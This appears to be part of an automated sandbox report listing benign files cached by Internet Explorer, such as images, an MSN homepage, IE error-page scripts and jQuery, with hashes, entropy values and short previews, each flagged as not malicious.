                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2313
                                                                                                                                                                                                                                  Entropy (8bit):7.594679301225926
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:5Zvh21Zt5SkY33fS+PuSsgSrrVi7X3ZgMjkCqBn9VKg3dPnRd:vkrrS333q+PagKk7X3ZgaI9kMpRd
                                                                                                                                                                                                                                  MD5:59DAB7927838DE6A39856EED1495701B
                                                                                                                                                                                                                                  SHA1:A80734C857BFF8FF159C1879A041C6EA2329A1FA
                                                                                                                                                                                                                                  SHA-256:544BA9B5585B12B62B01C095633EFC953A7732A29CB1E941FDE5AD62AD462D57
                                                                                                                                                                                                                                  SHA-512:7D3FB1A5CC782E3C5047A6C5F14BF26DD39B8974962550193464B84A9B83B4C42FB38B19BD0CEF8247B78E3674F0C26F499DAFCF9AF780710221259D2625DB86
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: GIF89a2.2.....7..;..?..C..I..H..<..9.....8..F..7..E..@..C..@..6..9..8..J..*z.G..>..?..A..6..>..8..:..A..=..B..4..B..D..=..K..=..@..<..:..3~.B..D.....,|.4..2..6..:..J..;..G....Fl..1}.4..R.....Y..E..>..9..5..X..A..2..P..J../|.9.....T.+Z.....+..<.Fq.Gn..V..;..7.Lr..W..C..<.Fp.]......A.....0{.L..E..H..@.....3..3..O..M..K....#[.3i..D..>........I....<n..;..Z..1..G..8..E....Hu..1..>..T..a.Fs..C..8..0}....;..6..t.Ft..5.Bi..:.x...E.....'z^~.......[....8`..........;..@..B.....7.....<.................F.....6...........>..?.n......g.......s...)a.Cm....'a.0Z..7....3f..<.:e.....@.q.....Ds..B....!P.n...J............Li..=......F.....B.....:r....w..|..........`..[}.g...J.Ms..K.Ft.....'..>..........Ry.Nv.n..]..Bl........S..;....Dj.....=.....O.y.......6..J.......)V..g..5.......!..NETSCAPE2.0.....!...d...,....2.2........3.`..9.(|.d.C .wH.(."D...(D.....d.Y......<.(PP.F...dL.@.&.28..$1S....*TP......>...L..!T.X!.(..@a..IsgM..|..Jc(Q.+.......2.:.)y2.J......W,..eW2.!....!....C.....d...zeh....P.
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\BBX2afX[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):879
                                                                                                                                                                                                                                  Entropy (8bit):7.684764008510229
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:nbwTOG/D9S9kmVgvOc0WL9P9juX7wlA3lrvfFRNa:bwTOk5S96vBB1jGwO3lzfxa
                                                                                                                                                                                                                                  MD5:4AAAEC9CA6F651BE6C54B005E92EA928
                                                                                                                                                                                                                                  SHA1:7296EC91AC01A8C127CD5B032A26BBC0B64E1451
                                                                                                                                                                                                                                  SHA-256:90396DF05C94DD44E772B064FF77BC1E27B5025AB9C21CE748A717380D4620DD
                                                                                                                                                                                                                                  SHA-512:09E0DE84657F2E520645C6BE20452C1779F6B492F67F88ABC7AB062D563C060AE51FC1E99579184C274AC3805214B6061AEC1730F72A6445AEBDB7E9F255755F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .PNG........IHDR................U....pHYs..........+.....!IDATx...K.Q..wfv.u.....*.,I"...)...z............>.OVObQ......d?|.....F.QI$....qf.s.....">y`......{~.6.Z.`.D[&.cV`..-8i...J.S.N..xf.6@.v.(E..S.....&...T...?.X)${.....s.l."V..r...PJ*!..p.4b}.=2...[......:.....LW3...A.eB.;...2...~...s_z.x|..o....+..x....KW.G2..9.....<.\....gv...n..1..0...1}....Ht_A.x...D..5.H.......W..$_\G.e;./.1R+v....j.6v........z.k............&..(....,F.u8^..v...d-.j?.w..;..O.<9$..A..f.k.Kq9..N..p.rP2K.0.).X.4..Uh[..8..h....O..V.%.f.......G..U.m.6$......X....../.=....f:.......|c(,.......l.\..<./..6...!...z(......# "S..f.Q.N=.0VQ._..|....>@....P.7T.$./)s....Wy..8..xV......D....8r."b@....:.E.E......._(....4w....Ir..e-5..zjg...e?./...|X..."!..'*/......OI..J"I.MP....#...G.Vc..E..m.....wS.&.K<...K*q..\...A..$.K......,...[..D...8.?..)..3....IEND.B`.
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\UpWol9RI[1].avi
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5
                                                                                                                                                                                                                                  Entropy (8bit):2.321928094887362
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:3:3
                                                                                                                                                                                                                                  MD5:5BFA51F3A417B98E7443ECA90FC94703
                                                                                                                                                                                                                                  SHA1:8C015D80B8A23F780BDD215DC842B0F5551F63BD
                                                                                                                                                                                                                                  SHA-256:BEBE2853A3485D1C2E5C5BE4249183E0DDAFF9F87DE71652371700A89D937128
                                                                                                                                                                                                                                  SHA-512:4CD03686254BB28754CBAA635AE1264723E2BE80CE1DD0F78D1AB7AEE72232F5B285F79E488E9C5C49FF343015BD07BB8433D6CEE08AE3CEA8C317303E3AC399
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: 0....
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\a8a064[1].gif
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 28 x 28
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):16360
                                                                                                                                                                                                                                  Entropy (8bit):7.019403238999426
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:g2SEiHys4AeP/6ygbkUZp72i+ccys4AeP/6ygbkUZaoGBm:g2Tjs4Ae36kOpqi+c/s4Ae36kOaoGm
                                                                                                                                                                                                                                  MD5:3CC1C4952C8DC47B76BE62DC076CE3EB
                                                                                                                                                                                                                                  SHA1:65F5CE29BBC6E0C07C6FEC9B96884E38A14A5979
                                                                                                                                                                                                                                  SHA-256:10E48837F429E208A5714D7290A44CD704DD08BF4690F1ABA93C318A30C802D9
                                                                                                                                                                                                                                  SHA-512:5CC1E6F9DACA9CEAB56BD2ECEEB7A523272A664FE8EE4BB0ADA5AF983BA98DBA8ECF3848390DF65DA929A954AC211FF87CE4DBFDC11F5DF0C6E3FEA8A5740EF7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: GIF89a.......dbd...........lnl.........trt..................!..NETSCAPE2.0.....!.......,..........+..I..8...`(.di.h..l.p,..(.........5H.....!.......,.........dbd...........lnl......dfd....................../..I..8...`(.di.h..l..e.....Q... ..-.3...r...!.......,.........dbd..............tvt...........................*P.I..8...`(.di.h.v.....A<.. ......pH,.A..!.......,.........dbd........|~|......trt...ljl.........dfd......................................................B`%.di.h..l.p,.t]S......^..hD..F. .L..tJ.Z..l.080y..ag+...b.H...!.......,.........dbd.............ljl.............dfd........lnl..............................................B.$.di.h..l.p.'J#............9..Eq.l:..tJ......E.B...#.....N...!.......,.........dbd...........tvt.....ljl.......dfd.........|~|.............................................D.$.di.h..l.NC.....C...0..)Q..t...L:..tJ.....T..%...@.UH...z.n.....!.......,.........dbd..............lnl.........ljl......dfd...........trt...
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\checksync[1].htm
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):21628
                                                                                                                                                                                                                                  Entropy (8bit):5.304819777739522
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:3OAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZOfQWwY4RXrqt:I86qhbS2RpF3OsfQWwY4RXrqt
                                                                                                                                                                                                                                  MD5:DDD356C3D15DF3F06EF6772D05ED53D7
                                                                                                                                                                                                                                  SHA1:4A34AC5B1AD6F7B7A960AA55405625CD60BF4FE6
                                                                                                                                                                                                                                  SHA-256:62812A69A8398073B8F53B582C04B6FD214D07146A580035611F646E74922398
                                                                                                                                                                                                                                  SHA-512:9C8C6264D621A6D2EEA15B1BB627D221ABA1CB367030137B00B440E50CB1641B623C6A7E0C49220D2B35AAE93D1DEA4E819046982808BE596CAB7619E947D473
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":80,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0},"ttd":{"name":"ttd","cookie":"data-ttd","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\de-ch[1].htm
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):422570
                                                                                                                                                                                                                                  Entropy (8bit):5.442053261488214
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:oJRJUwxx+hAkJ8WZcad0vr6emugoLQG8SLLvBAeXdnBMlqXXpLV:oJRxOhjo0G8kHMlqXX3
                                                                                                                                                                                                                                  MD5:775F3BE44358D3F66C2F9A3B086463DC
                                                                                                                                                                                                                                  SHA1:9847883EE3E8AD648B264BCFBC690B2791F6C722
                                                                                                                                                                                                                                  SHA-256:0C451255FF719B4C868FF35D4AD18CBE3DD11EA8BF6DF7B0F680766EB9B0AE37
                                                                                                                                                                                                                                  SHA-512:27CBC08105B9BBC67431C5683EC612B03177F151E2461B68359FCD87FCD4C367A0805BED55BFACBFABB95F2D59AD62FB8AA5EC87F137537F11D461805DD0D32B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: <!DOCTYPE html><html prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" lang="de-CH" class="hiperf" dir="ltr" >.. <head data-info="v:20210909_23937236;a:85798559-45c5-4b10-b741-80716ce798ce;cn:5;az:{did:951b20c4cd6d42d29795c846b4755d88, rid: 5, sn: neurope-prod-hp, dt: 2021-09-02T17:29:08.0751554Z, bt: 2021-09-09T00:14:30.9925819Z};ddpi:1;dpio:;dpi:1;dg:tmx.pc.ms.ie10plus;th:start;PageName:startPage;m:de-ch;cb:;l:de-ch;mu:de-ch;ud:{cid:,vk:homepage,n:,l:de-ch,ck:};xd:BBqgbZW;ovc:f;al:;fxd:f;xdpub:2021-08-11 10:21:32Z;xdmap:2021-09-10 09:10:40Z;axd:;f:msnallexpusers,muidflt20cf,muidflt56cf,mmxandroid1cf,platagyedge2cf,audexedge2cf,bingcollabedge1cf,pnehp1cf,starthp1cf,audexhz1cf,onetrustpoplive,msnapp2cf,1s-bing-news,vebudumu04302020,bbh20200521msncf,prg-1sw-cont,prg-1sw-hmtp,prg-1sw-lowctrl,prg-adspeek,btrecrow1,1s-winauthservice,prg-wpo-hpolypc,weather6cf,prg-1sw-flyt-htpc,prg-1sw-wcont3,prg-1sw-ownformat,prg-brandupwhp;userOptOut:false;userOptOutOptions:" data-js="{&quot
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\dnserror[1]
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2997
                                                                                                                                                                                                                                  Entropy (8bit):4.4885437940628465
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                                                                                                                                                                                                                                  MD5:2DC61EB461DA1436F5D22BCE51425660
                                                                                                                                                                                                                                  SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                                                                                                                                                                                                                                  SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                                                                                                                                                                                                                                  SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\errorPageStrings[1]
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4720
                                                                                                                                                                                                                                  Entropy (8bit):5.164796203267696
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                                                                                                                                                                                                  MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                                                                                                                  SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                                                                                                                  SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                                                                                                                  SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\errorPageStrings[2]
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4720
                                                                                                                                                                                                                                  Entropy (8bit):5.164796203267696
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                                                                                                                                                                                                  MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                                                                                                                  SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                                                                                                                  SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                                                                                                                  SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\httpErrorPagesScripts[1]
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12105
                                                                                                                                                                                                                                  Entropy (8bit):5.451485481468043
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                                                                                                                  MD5:9234071287E637F85D721463C488704C
                                                                                                                                                                                                                                  SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                                                                                                                  SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                                                                                                                  SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\http___cdn.taboola.com_libtrc_static_thumbnails_07804453bf90da635cf952e3d393ab12[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):23695
                                                                                                                                                                                                                                  Entropy (8bit):7.981916066043364
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:8ViqNzoTYUPRBfZ9FOnBywsaQg9dhJbbZ86Sh9NbkflSo+P:8JRUVZfOnByaPb9i6Sh/mu
                                                                                                                                                                                                                                  MD5:FB1A38AF3E936CC846BCCE134FD77093
                                                                                                                                                                                                                                  SHA1:B81E1178B58201BD9F664F2750510C3BF2803448
                                                                                                                                                                                                                                  SHA-256:D23689198DE867AEE58CDF9F95235F0CB5E07E92498CA3FD1D594A10825A2113
                                                                                                                                                                                                                                  SHA-512:7DD6D1E083963EC055DA879EB8C41451B0ABE12B738790EF047685EB6369B90D21152E81EDB8AD98587D48464F6C6E04CA8810CF591F508330D550F0E80296CD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ......JFIF.....................................................................&""&0-0>>T......................$.....$6"(""("60:/,/:0VD<<DVdTOTdylly............7...............6...................................................................0T..]..kd{....H.k].7.kXB.^9.J.c.....k.;.Je/ 8..Z.....?..r....`u*%.Es....~..S..$...r.w.]..'?L....,4.m&....!r>.(.h.X...k\f.F1..c...X.U..'W...9..y~@b....z...........L..C......oD.9./..g.$+.P..5AE.z~MU.K..~.j..?|).....<..0.]...(.Y..s.f.r.Mg.(....U....C4f.....$z.U.s.^\.... .j.3r....r....u.B...1.T.@UL8*...Q&..s.....}^..9...V.@f..l...}..v7-U.X6q.f.BW.U.R......l...[.d.........}..z.p....&.d.WY<...V......F.w.Y.~.]W.;j..s.......)q..c...M=..3.7>..h.Cr...7|..o.`....Y:-.....N.p....zc..z...|.....C....F.Gl)k]d..a{.<F....u..t]M......w..E.}...........yt..G........uw.}..;.F..y....\v.<.Lva....5 ....^...2.L..8...{.7..n2v..L.:............z....3.G.<..|.L....;M..@.s._.......jB5..x4w.=.......Nso../[)u#....`77Y..@{^l...4Fd..t..J...u(%
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\http___cdn.taboola.com_libtrc_static_thumbnails_11b9f069e5e00ff6dd3050259af20493[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15509
                                                                                                                                                                                                                                  Entropy (8bit):7.958249795493221
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:ZvHVQHFciO+PTTADMJnK5HmW659pgMGAvkU4kVehfgA/:Zv8ciHPTWMJKQl6MGZDhfX
                                                                                                                                                                                                                                  MD5:BF391688F908C659D6E40B810AAE418C
                                                                                                                                                                                                                                  SHA1:BD1AD5B9B8B8D8BAED7B7EC29867AB047A1AEB7D
                                                                                                                                                                                                                                  SHA-256:89C9BF8685D7706CF2851953B0347F74627AA31E74B9112A7BBDAA1300B5BF1F
                                                                                                                                                                                                                                  SHA-512:BB598A204EA478DA7B574A2191B4D9582CF351048298502A74BF8DF4B03AB0142253E4FD9A2C63E33FC6E8B55C61FDB77B3A046A59D7404A13E25E3C1ACCC73C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ......JFIF..........................................................+".."+2*(*2<66<LHLdd.............................................+".."+2*(*2<66<LHLdd.......7...."..........4.................................................................d**.Z..."9a..M.V...&.T......x.)0..H.A..p.Y..5.F4..&..i.y.........u.x._uN.....Z.Ss....,e@W...- EvR..N.. LEV...ES..=.#*..[.^.......w.SE.bH2.L...E.L'Q.H...GI.....X..a*.cE.5[.........I0..V...m...#....]%V.w....) ...E...9....U...UWo.R..z*.2. .......^j.?...,.....`.yz....b.i;...e.u./OGV_.t..|....j..y.J ..D.....Z...S.,l.....".u.2X.j.../.<......`.q8p..u......m1.....8.l...+*0.#.p[O.5h......:..l.}6y.X.....[.".U.7....U"..U.Y.......HX#....E...M2D\)............zlWn8..;_..{RQ.T1cdm...X..ep.e@`~..8yP.Y.....5....S0...z(..w....{...b.@V.....E..G}(...../w8.K..v.....Pg........A...^.F.?./<.f.yrj..}.....O*.)&'.]Usm..Mm:_2....n[..u{....5.4r.9cN.l..X..N...HSo....^.....X......TL..f\$..}+.t.?.3..z.=Dj..=...G#..`U.d5y-.AY...fkcS2Mu.C)........
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\jquery-2.1.1.min[1].js
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):84249
                                                                                                                                                                                                                                  Entropy (8bit):5.369991369254365
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:DPEkjP+iADIOr/NEe876nmBu3HvF38NdTuJO1z6/A4TqAub0R4ULvguEhjzXpa9r:oNM2Jiz6oAFKP5a98HrY
                                                                                                                                                                                                                                  MD5:9A094379D98C6458D480AD5A51C4AA27
                                                                                                                                                                                                                                  SHA1:3FE9D8ACAAEC99FC8A3F0E90ED66D5057DA2DE4E
                                                                                                                                                                                                                                  SHA-256:B2CE8462D173FC92B60F98701F45443710E423AF1B11525A762008FF2C1A0204
                                                                                                                                                                                                                                  SHA-512:4BBB1CCB1C9712ACE14220D79A16CAD01B56A4175A0DD837A90CA4D6EC262EBF0FC20E6FA1E19DB593F3D593DDD90CFDFFE492EF17A356A1756F27F90376B650
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: /*! jQuery v2.1.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */..!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.1",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,funct
